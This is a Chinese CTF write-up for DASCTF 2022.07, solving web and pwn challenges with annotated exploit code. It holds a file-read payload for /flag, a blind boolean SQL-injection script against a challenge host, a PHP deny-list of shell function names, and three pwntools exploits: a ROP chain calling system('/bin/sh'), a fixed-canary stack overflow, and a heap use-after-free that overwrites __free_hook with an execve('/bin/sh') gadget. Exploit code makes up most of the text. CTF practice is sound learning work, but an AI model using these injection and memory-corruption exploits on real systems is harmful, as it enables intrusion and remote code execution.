2022 DASCTF2022.07赋能赛 部分web pwn wp
前言:给自己两个大嘴巴子,pwn3,一直在用sendline,呜呜,应该send才可以,呜呜呜,卡在这卡了一下午,在一个地方翻了两次(好几次)车呜呜呜呜呜太菜了我
WEB
Ez to getflag
f12,根据猜测直接查找upload.php
发现有代码
<!--?php
error_reporting(0);
session_start();
require_once('class.php');
$upload = new Upload();
$upload--->
查找class.php
f = $_FILES;
}
/**
 * Persist the pending upload under upload/ as <md5(client-supplied name)>.png.
 *
 * The on-disk name is derived only from the MD5 of the client-supplied file
 * name and always receives a .png suffix, so the original extension never
 * reaches disk. A previous file with the same hashed name is removed first
 * (unlink errors are silenced with @). The success message is echoed
 * unconditionally — the return value of move_uploaded_file() is not checked.
 */
function savefile() {
    $stored = md5($this->f["file"]["name"]) . ".png";
    $existing = './upload/' . $stored;
    // Re-uploading a file with the same name replaces the earlier copy.
    if (file_exists($existing)) {
        @unlink($existing);
    }
    move_uploaded_file($this->f["file"]["tmp_name"], "upload/" . $stored);
    echo "upload success! :D";
}
/**
 * String-conversion hook.
 *
 * Reads the properties fname and fsize — neither is assigned anywhere in the
 * visible code — and echoes $fname->$fsize, i.e. a property read whose name
 * is chosen at run time on whatever object fname holds. Because PHP invokes
 * __toString on any string cast (echo, concatenation, comparison), what this
 * prints is entirely determined by the object's current state. The return
 * value is the fixed marker 'this_is_upload'.
 */
function __toString() {
    $holder = $this->fname;
    $member = $this->fsize;
    echo $holder->$member;
    return 'this_is_upload';
}
/**
 * Upload entry point: run file_check() and store the file only if it passes.
 *
 * A rejected upload produces no output beyond what file_check() already
 * echoed; nothing is returned in either case.
 */
function uploadfile() {
    if (!$this->file_check()) {
        return;
    }
    $this->savefile();
}
/**
 * Decide whether the pending upload may be stored.
 *
 * Checks, in order:
 *  1. the last dot-separated segment of the client-supplied file name must
 *     equal "png" (the only entry in the allow-list);
 *  2. the file body must not match a case-insensitive deny-list of PHP tags
 *     and function names.
 * Echoes a short message and returns false on the first failing check;
 * returns true when both pass.
 *
 * Security note: the extension check trusts the client-supplied name and the
 * body check is a keyword deny-list, not a positive validation of the image
 * format (no magic-byte / image-decoding check). Deny-lists of this kind are
 * weak on their own; validating the actual format and serving uploads from a
 * location where the server never executes files is the usual remedy.
 */
function file_check() {
    $allowed_types = array("png");
    $segments = explode(".", $this->f["file"]["name"]);
    $extension = end($segments);

    if (empty($extension)) {
        echo "what are you uploaded? :0";
        return false;
    }
    if (!in_array($extension, $allowed_types)) {
        echo 'png onlyyy! XP';
        return false;
    }

    // Content deny-list; preg_match_all() returns the match count, so any hit rejects.
    $filter = '/<\?php|php|exec|passthru|popen|proc_open|shell_exec|system|phpinfo|assert|chroot|getcwd|scandir|delete|rmdir|rename|chgrp|chmod|chown|copy|mkdir|file|file_get_contents|fputs|fwrite|dir/i';
    $body = file_get_contents($this->f["file"]["tmp_name"]);
    if (preg_match_all($filter, $body)) {
        echo 'what are you doing!! :C';
        return false;
    }
    return true;
}
}
class Show{
public $source;
/**
 * Store the requested path verbatim; it is read by show() later.
 *
 * No validation happens here — the only filtering on this value is the
 * scheme / ".." pattern check inside show().
 *
 * @param string $fname Path or stream target supplied by the caller.
 */
public function __construct($fname) {
    $this->source = $fname;
}
public function show()
{
if(preg_match('/http|https|file:|php:|gopher|dict|\.\./i',$this->source)) {
die('illegal fname :P');
} else {
echo file_get_contents($this->source);
$src = "data:jpg;base64,".base64_encode(file_get_contents($this->source));
echo "
继续探索
file.php
<!--?php
error_reporting(0);
session_start();
require_once('class.php');
$filename = $_GET['f'];
$show = new Show($filename);
$show--->
发现可以直接读取文件,尝试读取flag,发现可以读取成功
payload:
http://90330b8d-de6c-4e54-bc6f-6c41ed81dedb.node4.buuoj.cn:81/file.php?f=/flag
DASCTF{5f31248c-b20d-423a-baaa-703fb5c8a0a1}
绝地防御
静态页面,f12翻找js文件,在js文件里找到php文件,是个布尔型sql注入,有waf和前台验证,直接burp抓包即可绕过,我这里直接在网上找了个exp脚本来跑,跑了好久呜呜
exp:
#coding:utf-8
import requests
def database_len():
    """Find the length of the current database name with a boolean SQL-injection oracle.

    Each request appends ``and length(database())>i`` to the ``id`` parameter
    and treats the substring ``admin`` in the response body as "condition
    true". The first ``i`` for which the condition is false is printed as the
    length and the loop stops; ``i`` is bounded to 1..9 by the range.

    Defender notes: a burst of requests to one endpoint that differ only in an
    injected predicate is a strong access-log signal for blind SQLi probing;
    the server-side fix is a parameterised query for ``id`` so the predicate
    is never interpreted as SQL.
    """
    for i in range(1,10):
        url = '''http://26779839-e1c7-4eca-9f15-24da4f4d28e4.node4.buuoj.cn:81/SUPPERAPI.php'''
        payload = '''?id=1 and length(database())>%s''' %i  # format the probe string
        # print(url+payload+'%23')
        r = requests.get(url+payload)
        if 'admin' in r.text:
            print(i)  # condition true: the length is still greater than i
        else:
            #print('false')
            print('database_length:',i)
            break
database_len()  # runs at script execution time; the result is only printed, not returned
def database_name():
    """Recover the database name one character at a time with the same boolean oracle.

    For each position ``j`` in 1..8, every character of a fixed lowercase
    alphabet is tried in ``substr(database(),j,1)='c'``; the first candidate
    whose response contains ``admin`` is appended to ``name`` and the partial
    result is printed. Both the position count and the alphabet are hard-coded
    here (not taken from database_len()); a position where no candidate
    matches contributes nothing to ``name``.

    Defender notes: same detection signal as database_len() — many requests
    varying only in the predicate. Parameterised queries remove the injection
    itself; returning the same response regardless of the predicate removes
    the content-based oracle this loop relies on.
    """
    name = ''
    for j in range(1,9):
        for i in 'sqcwertyuioplkjhgfdazxvbnm':
            url = "http://26779839-e1c7-4eca-9f15-24da4f4d28e4.node4.buuoj.cn:81/SUPPERAPI.php?id=1 and substr(database(),%d,1)='%s'" %(j,i)
            # print(url+'%23')
            r = requests.get(url)
            if 'admin' in r.text:
                name = name+i
                print(name)
                break
    print('database_name:',name)
database_name()  # second step; runs after database_len() has printed the length
PWN
eyfor
思路:整数溢出+栈溢出,-1就能绕过,然后就是基础rop
exp:
from pwn import *
# A local process is opened and then immediately shadowed by the remote
# connection; only the remote target is driven below.
p=process("./pwn4")
p=remote("node4.buuoj.cn","27756")
elf1=ELF("./pwn4")
# Address of system()'s PLT stub, read from the local copy of the binary.
# Every address in this script is hard-coded, which presumes the binary is
# loaded at a fixed base (no PIE) — TODO confirm against the binary's flags.
# Mitigation note: PIE plus a stack canary would invalidate both the fixed
# addresses and the plain return-address overwrite the write-up describes.
system=elf1.plt['system']
p.sendlineafter("go\n",'\x00'*0x30)
# Four prompts answered with '-1' plus one more bare line: the write-up's 思路
# attributes the bypass to an integer overflow in how this value is checked.
p.sendlineafter("message:",'-1')
p.sendlineafter("message:",'-1')
p.sendlineafter("message:",'-1')
p.sendlineafter("message:",'-1')
p.sendline('-1')
buf=0x6010C0
# payload2 is the one actually sent; 'payload' below is built but never used
# (presumably an earlier attempt that was left in).
payload2='/bin/sh\x00'+'a'*(0x30-8)+'b'*8+p64(0x000000000040063e)+p64(0x0000000000400983)+p64(buf)+p64(system)
payload='cat flag'+'a'*(0x30-8)+'b'*8+p64(0x4007B7)
sleep(0.5)
p.sendline(payload2)
raw_input()  # Python 2 only: pauses until Enter before handing the session over
p.interactive()
MyCanary2
思路:add canary能写成固定的,然后基础栈溢出打后门,leak固定,然后退出返回地址到后门即可
exp:
from pwn import *
# The local handle is immediately overwritten by the remote one; only the
# remote service is exercised.
p=process('./MyCanary2')
p=remote("node4.buuoj.cn","25051")
def add(code):
    """Menu option 1: answer the 'choice' prompt with 1, then send ``code`` at the 'code:' prompt.

    Both writes use sendlineafter, so a trailing newline is appended to ``code``.
    """
    p.sendlineafter("choice\n",'1')
    p.sendlineafter("code:\n",code)
def leak():
    """Menu option 2. Only selects the option; nothing is read back here."""
    p.sendlineafter("choice\n",'2')
# One add() with 0x6c filler bytes, a 4-byte zero where the write-up says the
# (fixed) canary sits, 8 bytes of padding, then two return addresses; menu 2
# and then menu 3 (the write-up's exit path) so the overwritten return
# address is used.
# Defender note: a canary that is constant across runs gives no protection
# once its value is known; stack protection depends on a per-process random
# value, which is what the default compiler/libc setup provides.
add('a'*0x6c+p32(0x0)+'b'*8+p64(0x40101a)+p64(0x401573))
leak()
p.sendlineafter("choice\n",'3')
p.interactive()
compat
思路:能错误地使用free,从而leak出libc基地址;add里有个任意写,检查是a1&0x80!=0,写个0xff就能过。这里有个点卡了我一下午:用read写入数据时要用send,不能用sendline,因为sendline会多发一个0a,导致我写完0xff后多出的0a被下一个read读走,下面的read就用不了了,给自己两个大嘴巴子。绕过检测后就可以利用任意写劫持下个chunk,任意写进tc为freehook,就可以rce了,我好菜,!!!!!
exp:
from pwn import *
def add(data,tag):
    """Menu option 1: send ``data`` and then ``tag``, each with send() (no trailing newline).

    Both values pass through str(); on Python 2 a str payload is forwarded
    unchanged. Per the write-up, the service read()s these fields directly, so
    sendline's extra newline byte would spill into the following read — hence
    sendafter rather than sendlineafter here.
    """
    p.sendlineafter("choice: \n",'1')
    p.sendafter("data: \n",str(data))
    p.sendafter("tag: \n",str(tag))
def show(idx):
    """Menu option 2: print the entry at ``idx``. Nothing is read back here; the caller recv()s."""
    p.sendlineafter("choice: \n",'2')
    p.sendlineafter("idx: \n",str(idx))
def dele(idx):
    """Menu option 3 (delete) for the entry at ``idx``; per the write-up this is the free() path."""
    p.sendlineafter("choice: \n",'3')
    p.sendlineafter("idx: \n",str(idx))
def reset():
    """Menu option 4 (reset). Takes no argument."""
    p.sendlineafter("choice: \n",'4')
# Local run only — there is no remote() line in this script. The binary is
# named "compact" while the section heading says "compat".
p=process("./compact")
# Phase 1 (libc leak): fill eight entries, delete them all, add two more,
# delete indices 0 and 1 again, reset, refill seven, then add an 8-byte 'A'
# marker. show(7) prints the marker followed by bytes that are read back as a
# libc pointer. The write-up attributes this to free() being usable
# incorrectly — the use-after-free / double-free bug class.
for i in range(8):
    add("jjjj"+str(i),"\x00")
for i in range(8):
    dele(i)
add('j1','\x00')
add('j2','\x00')
dele(0)
dele(1)
reset()
for i in range(7):
    add("jj"+str(i),"\x00")
add("A"*8,"\x00")
show(7)
p.recvuntil('A'*8)
# Six bytes of the leaked pointer, zero-padded to eight; 0x1ecbe0 is a
# hard-coded offset specific to one libc build.
libc_base=u64(p.recv(6).ljust(8,b'\x00'))-0x1ecbe0
print hex(libc_base)  # Python 2 print statement: this script does not run under Python 3
# The local system libc is used for symbol offsets; this assumes the target
# runs the same build.
libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
# String literal used as a comment: a gadget listing with its register constraints.
'''
0xe3afe execve("/bin/sh", r15, r12)
constraints:
[r15] == NULL || r15 == NULL
[r12] == NULL || r12 == NULL
0xe3b01 execve("/bin/sh", r15, rdx)
constraints:
[r15] == NULL || r15 == NULL
[rdx] == NULL || rdx == NULL
0xe3b04 execve("/bin/sh", rsi, rdx)
constraints:
[rsi] == NULL || rsi == NULL
[rdx] == NULL || rdx == NULL
'''
rce=libc_base+0xe3b01  # the second entry of the listing above
# Mitigation note: __free_hook exists only in glibc < 2.34 — the malloc/free
# hooks were removed in 2.34, so this write target is absent on current
# distributions.
free_hook=libc_base+libc.sym['__free_hook']
# Phase 2 set-up: drain all eight entries and reset.
for i in range(8):
    dele(i)
reset()
# Commented-out duplicate of the loop above (string literal, not executed).
'''
for i in range(8):
dele(i)
reset()
'''
add("aaaa","\x00") # 0
add("jsjs","\x00") # 1
# The tag byte 0xff satisfies the a1&0x80 check the write-up mentions; the
# four bytes that follow go out with a raw send() — not sendline — because,
# as the write-up notes, an extra 0x0a would be consumed by the next read().
payload="\x00"*0x60+p64(0)+p64(0x91)
add(payload,"\xff") # 2
p.send("\x00"*3+"\x90")
add("jsjs","\x00") # 3
add("jsjsjs","\x00") # 4
dele(0)
dele(1)
dele(3)
dele(2)
reset()
# The write-up's arbitrary write: free_hook is planted so that a later add()
# hands back memory overlapping __free_hook.
payload=p64(0)*3+p64(0x21)+p64(free_hook+0x90)+2*p64(0)+p64(0x91)+p64(free_hook)
add(payload,"\x00") # 0
add("aaaaaa","\x00") # 1
gdb.attach(p)  # debugger attach left in the final script; requires gdb on the machine
add(p64(rce),'\x00')  # writes the gadget address into the hook's location
gdb.attach(p)
dele(4)  # the free() that now goes through the overwritten hook
reset()
p.interactive()
总结:题不难,就是需要仔细,这俩字仔细基本上每次比赛都提醒自己就是不注意呜呜呜!!!!!!